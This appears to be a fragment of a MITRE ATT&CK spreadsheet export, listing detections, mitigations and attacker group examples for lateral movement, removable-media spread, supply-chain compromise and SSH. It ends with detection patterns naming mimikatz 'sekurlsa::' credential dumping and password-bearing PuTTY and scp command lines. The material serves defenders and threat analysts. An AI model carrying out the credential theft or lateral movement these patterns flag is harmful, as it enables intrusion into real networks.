GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.(Citation: Secureworks REvil September 2019)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.(Citation: MSTIC DEV-0537 Mar 2022)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.(Citation: Microsoft POLONIUM June 2022)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has compromised third party service providers to gain access to victim's environments.(Citation: Profero APT27 December 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used legitimate access granted to Managed Service Providers in order to access victims of interest.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Symantec Cicada November 2020)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Configuration management databases (CMDB) and other asset management systems may help with the detection of computer systems or network devices that should not exist on a network.
Drive Creation
Monitor for newly constructed drives or other related events associated with computer hardware and other accessories (especially new or unknown) being connected to systems. Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.
Limit Access to Resource Over Network
Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.
Limit Hardware Installation
Block unknown devices and accessories by endpoint security configuration and monitoring agent.
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company’s local network.(Citation: Securelist DarkVishnya Dec 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Drive Creation
Monitor for newly constructed drive letters or mount points to removable media
File Access
Monitor for unexpected files accessed on removable media.
File Creation
Monitor for newly constructed files on removable media
Process Creation
Monitor for newly executed processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to block unsigned/untrusted executable files (such as .exe, .dll, or .scr) from running from USB removable drives. (Citation: win10_asr)
Disable or Remove Feature or Program
Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)
Limit Hardware Installation
Limit the use of USB devices and removable media within a network.
APT28
[APT28](https://attack.mitre.org/groups/G0007) uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.(Citation: Microsoft SIR Vol 19)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment.(Citation: SentinelOne Aoqin Dragon June 2022)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012)'s selective infector modifies executables stored on removable media as a method of spreading across computers.(Citation: Kaspersky Darkhotel)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.(Citation: FBI Flash FIN7 USB)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malicious DLLs to spread malware to connected removable USB drives on infected machines.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a customized [PlugX](https://attack.mitre.org/software/S0013) variant which could spread through USB connections.(Citation: Avira Mustang Panda January 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has attempted to transfer [USBferry](https://attack.mitre.org/software/S0452) from an infected USB device by copying an Autorun function to the target machine.(Citation: TrendMicro Tropic Trooper May 2020)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) has been spread via infected USB keys.(Citation: Mandiant Suspected Turla Campaign February 2023)
Agent.btz
[Agent.btz](https://attack.mitre.org/software/S0092) drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.(Citation: ThreatExpert Agent.btz)
CHOPSTICK
Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) variants used the Windows AUTORUN feature to spread through USB propagation.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can spread across systems by infecting removable media.(Citation: Kaspersky Transparent Tribe August 2020)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) searches for removable media and duplicates itself onto it.(Citation: DustySky)
Flame
[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to removable media.(Citation: Cisco H1N1 Part 2)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has the ability to use removable drives to spread through compromised networks.(Citation: Trend Micro Qakbot May 2020)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)	
SHIPSHAPE
[APT30](https://attack.mitre.org/groups/G0013) may have used the [SHIPSHAPE](https://attack.mitre.org/software/S0028) malware to move onto air-gapped networks. [SHIPSHAPE](https://attack.mitre.org/software/S0028) targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.(Citation: FireEye APT30)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.(Citation: ESET Sednit USBStealer 2014)
USBferry
[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)
Unknown Logger
[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of spreading to USB devices.(Citation: Forcepoint Monsoon)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected removable drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.
Host Status
Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes and compare against known good baseline behavior.
Update Software
A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.
Vulnerability Scanning
Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)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Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) conducted internal spearphishing from within a compromised organization.(Citation: ClearSky Lazarus Aug 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.(Citation: ESET Gamaredon June 2020)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.(Citation: SecureWorks August 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has sent internal spearphishing emails for lateral movement after stealing victim information.(Citation: KISA Operation Muzabi)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has conducted internal spearphishing within the victim's environment for lateral movement.(Citation: CISA AA21-200A APT40 July 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for user accounts logged into systems that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). For example, on Linux systems SSH logon activity can be found in the logs located in &lt;code&gt;/var/log/auth.log&lt;/code&gt; or &lt;code&gt;/var/log/secure&lt;/code&gt; depending on the distro you are using.
For Linux systems, the Audit framework (auditd) can be used to monitor any writes to SSH log files that store information about logged in accounts such as /var/log/auth.log.
For macOS systems (10.12+), Unified Logs can be queried to show SSH daemon (sshd) messages that include information on logged in accounts. The following command-line can be used to query the last hour’s worth of unified logs in this manner: &lt;code&gt;log show -info --debug --predicate 'processImagePath CONTAINS "sshd" AND eventMessage CONTAINS "Accepted"' --last 1h | grep sshd &lt;/code&gt;
Network Connection Creation
Monitor for newly constructed network connections (typically port 22) that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH.
Network Analysis Frameworks such as Zeek can be used to capture, decode, and alert on network traffic. Accordingly, they can be used to look for the creation of SSH network connections.
Process Creation
Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). For example, on macOS systems &lt;code&gt;log show --predicate 'process = "sshd"'&lt;/code&gt; can be used to review incoming SSH connection attempts for suspicious activity. The command &lt;code&gt;log show --info --predicate 'process = "ssh" or eventMessage contains "ssh"'&lt;/code&gt; can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
For Linux systems, the Audit framework (auditd) can be used to monitor for the creation of SSH related processes such as ssh. 
For macOS systems (10.12+), the above command can be used to look through the Unified Logs for SSH connection activity, though we also recommend including the “—debug” parameter to ensure that all relevant data is returned: &lt;code&gt;log show --info --debug --predicate 'process = "ssh" or eventMessage contains "ssh"'&lt;/code&gt;
Disable or Remove Feature or Program
Disable the SSH daemon on systems that do not require it. For macOS ensure Remote Login is disabled under Sharing Preferences.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Multi-factor Authentication
Require multi-factor authentication for SSH connections wherever possible, such as password protected SSH keys.
User Account Management
Limit which user accounts are allowed to login via SSH.
APT39
[APT39](https://attack.mitre.org/groups/G0087) used secure shell (SSH) to move laterally among their targets.(Citation: FireEye APT39 Jan 2019)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used Putty for remote access.(Citation: Symantec Palmerworm Sep 2020)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has remotely accessed compromised environments via secure shell (SSH) for lateral movement.(Citation: Mandiant FIN13 Aug 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used SSH to move laterally through victim environments.(Citation: CrowdStrike Carbon Spider August 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the PuTTY and Plink tools for lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GCMAN
[GCMAN](https://attack.mitre.org/groups/G0036) uses Putty for lateral movement.(Citation: Securelist GCMAN)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.(Citation: Kaspersky ThreatNeedle Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) used ssh for internal reconnaissance.(Citation: FireEye APT40 March 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used Putty to access compromised systems.(Citation: Unit42 OilRig Playbook 2023)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)	
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.(Citation: FireEye TRITON 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used SSH to connect back to victim machines.(Citation: Intezer TeamTNT September 2020) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used SSH to transfer tools and payloads onto victim hosts and execute them.(Citation: Cisco Talos Intelligence Group)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used Putty Secure Copy Client (PSCP) to transfer data.(Citation: PWC Cloud Hopper April 2017)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can SSH to a remote service.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) contains modules for executing commands over SSH as well as in-memory VNC agent injection.(Citation: Github PowerShell Empire)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used SSH for lateral movement.(Citation: Aqua Kinsing April 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation.
Network Traffic Content
Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.
Application Isolation and Sandboxing
Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Disable or Remove Feature or Program
Minimize available services to only those that are necessary.
Exploit Protection
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.
Network Segmentation
Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods.
Privileged Account Management
Minimize permissions and access for service accounts to limit impact of exploitation.
Threat Intelligence Program
Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.
Update Software
Update software regularly by employing patch management for internal enterprise endpoints and servers.
Vulnerability Scanning
Regularly scan the internal network for available services to identify new and potentially vulnerable services.
APT28
[APT28](https://attack.mitre.org/groups/G0007) exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017)(Citation: MS17-010 March 2017)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.(Citation: CISA AA20-296A Berserk Bear December 2020)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has exploited ZeroLogon (CVE-2020-1472) against vulnerable domain controllers.(Citation: CrowdStrike Carbon Spider August 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has exploited known vulnerabilities in remote services including RDP.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: ClearSky Pay2Kitten December 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited MS17-010 to move laterally to other systems on the network.(Citation: Unit42 Emissary Panda May 2019)	
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used EternalBlue exploits for lateral movement.(Citation: TrendMicro Tonto Team October 2020)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used tools to exploit the ZeroLogon vulnerability (CVE-2020-1472).(Citation: Symantec Cicada November 2020)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) used the EternalRomance SMB exploit to spread through victim networks.(Citation: Secure List Bad Rabbit)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.(Citation: SANS Conficker)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation.(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: Red Canary Emotet Feb 2019) 
Empire
[Empire](https://attack.mitre.org/software/S0363) has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.(Citation: Github PowerShell Empire)
Flame
[Flame](https://attack.mitre.org/software/S0143) can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.(Citation: ESET InvisiMole June 2020)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).(Citation: Unit 42 Lucifer June 2020)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains a module for exploiting SMB via EternalBlue.(Citation: GitHub PoshC2)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can move laterally using worm-like functionality through exploitation of SMB.(Citation: Crowdstrike Qakbot October 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.(Citation: ESET Trickbot Oct 2020)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) uses an exploit in SMBv1 to spread itself to other remote systems on a network.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: US-CERT WannaCry 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files
File Creation
Monitor newly constructed files to/from a lateral tool transfer 
File Metadata
Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.
Named Pipe Metadata
Monitor for contextual data about named pipes on the system.
Network Share Access
Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as SMB.
Network Traffic Content
Monitor for unusual processes with internal network connections creating files on-system may be suspicious 
Note: Analytic Event Type is for Zeek but can also be implemented in other Network Analysis Frameworks by parsing &amp; decoding captured SMB2 network traffic. From a network traffic capture standpoint, it’s important to capture the right traffic for this type of detection to function (e.g., all endpoint to endpoint if possible or workstation to server and workstation to workstation). As such, it is helpful to have a centralized server area where it is possible to monitor communications between servers and endpoints.
- Analytic 1 and 2 are very similar, with the key difference being that Implementation 2 is intended to capture multiple attempts at lateral movement originating from the same host within a short time period (5 minutes).
&lt;h4&gt; Analytic 1 - Basic &lt;/h4&gt;
&lt;code&gt; suspicious_smb_traffic = filter log_events where (
(event_id == "smb2_write_response" OR event_id == "smb1_write_response" OR event_id == "smb1_write_andx_response") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$") )&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Multiple Attempts (Time Window)&lt;/h4&gt;
&lt;code&gt;suspicious_smb_traffic = filter log_events where (
(event_id == "smb2_write_response" OR event_id == "smb1_write_response" OR event_id == "smb1_write_andx_response") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$") REPEATS 5 TIMES WITHIN 5 MINUTES FROM SAME src_ip)&lt;/code&gt;
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware. 
Process Creation
Monitor newly constructed processes that assist in lateral tool transfers. 
Filter Network Traffic
Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP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(Citation: University of Birmingham C2)
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) moved their tools laterally within the corporate network and between the ICS and corporate network. (Citation: Booz Allen Hamilton)
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used `move` to transfer files to a network share.(Citation: Dragos Crashoverride 2018)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used WMI to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto additional hosts within a compromised network.(Citation: DFIR Conti Bazar Nov 2021)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used SMB to copy files to and from target systems.(Citation: FoxIT Wocao December 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has deployed tools after moving laterally using administrative accounts.(Citation: Cybereason Cobalt Kitty 2017)	
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has spread malware in target networks by copying modules to folders masquerading as removable devices.(Citation: SentinelOne Aoqin Dragon June 2022)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has copied tools between compromised hosts using SMB.(Citation: NCC Group Chimera January 2021)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.(Citation: FireEye FIN10 June 2017)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) has used [PsExec](https://attack.mitre.org/software/S0029) to move laterally between hosts in the target network.(Citation: Microsoft GALLIUM December 2019)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has copied tools within a compromised network using RDP.(Citation: DFIR Phosphorus November 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used `move` to transfer files to a network share and has copied payloads--such as [Prestige](https://attack.mitre.org/software/S1058) ransomware--to an Active Directory Domain Controller and distributed via the Default Domain Group Policy Object.(Citation: Dragos Crashoverride 2018)(Citation: Microsoft Prestige ransomware October 2022) 
Turla
[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can be used to transfer files to/from victim machines on the local network.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has copied web shells between servers in targeted environments.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the &lt;code&gt;%TEMP%&lt;/code&gt; directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)
BITSAdmin
[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files from SMB file servers.(Citation: Microsoft About BITS)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can replicate itself across connected servers via `psexec`.(Citation: Microsoft BlackCat Jun 2022)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) searches for network drives and removable media and duplicates itself onto them.(Citation: DustySky)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has copied itself to remote systems using the `service.exe` filename.(Citation: Binary Defense Emotes Wi-Fi Spreader)
Expand
[Expand](https://attack.mitre.org/software/S0361) can be used to download or upload a file over a network share.(Citation: LOLBAS Expand)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can copy files to other machines on a compromised network.(Citation: ESET Hermetic Wizard March 2022)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.(Citation: Unit42 LockerGoga 2019)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can use [certutil](https://attack.mitre.org/software/S0160) for propagation on Windows hosts within intranets.(Citation: Unit 42 Lucifer June 2020)
Netwalker
Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) attempts to copy itself to remote machines on the network.(Citation: Talos Olympic Destroyer 2018)
PsExec
[PsExec](https://attack.mitre.org/software/S0029) can be used to download or upload a file over a network share.(Citation: PsExec Russinovich)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) attempts to copy itself to remote machines on the network.(Citation: Palo Alto Shamoon Nov 2016)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) attempts to copy itself to remote computers after gaining access via an SMB exploit.(Citation: LogRhythm WannaCry)
cmd
[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected internal system.(Citation: TechNet Copy)
esentutl
[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a remote share.(Citation: LOLBAS Esentutl)
ftp
[ftp](https://attack.mitre.org/software/S0095) may be abused by adversaries to transfer tools or files between systems within a compromised environment.(Citation: Microsoft FTP)(Citation: Linux FTP)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters.
Any tool of interest with commonly known command line usage can be detecting by command line analysis. Known substrings of command lines include
- PuTTY
- port forwarding &lt;code&gt;-R * -pw&lt;/code&gt;
- secure copy (scp) &lt;code&gt;-pw * * *@*&lt;/code&gt;
- mimikatz &lt;code&gt;sekurlsa::&lt;/code&gt;
- RAR &lt;code&gt;* -hp *&lt;/code&gt;
- Archive* a * Additionally, it may be useful to find IP addresses in the command line
- &lt;code&gt;\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}&lt;/code&gt;
&lt;h4&gt;Analytic 1 - Suspicious Arguments&lt;/h4&gt;
&lt;code&gt;port_fwd = filter process where (command_line match "-R .* -pw")
scp = filter process where (command_line match "-pw .* .* .*@.*"
mimikatz = filter process where (command_line match "sekurlsa")
rar = filter process where (command_line match " -hp ")
archive = filter process where (command_line match ".* a .*")
ip_addr = filter process where (command_line match \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})&lt;/code&gt;
Logon Session Creation
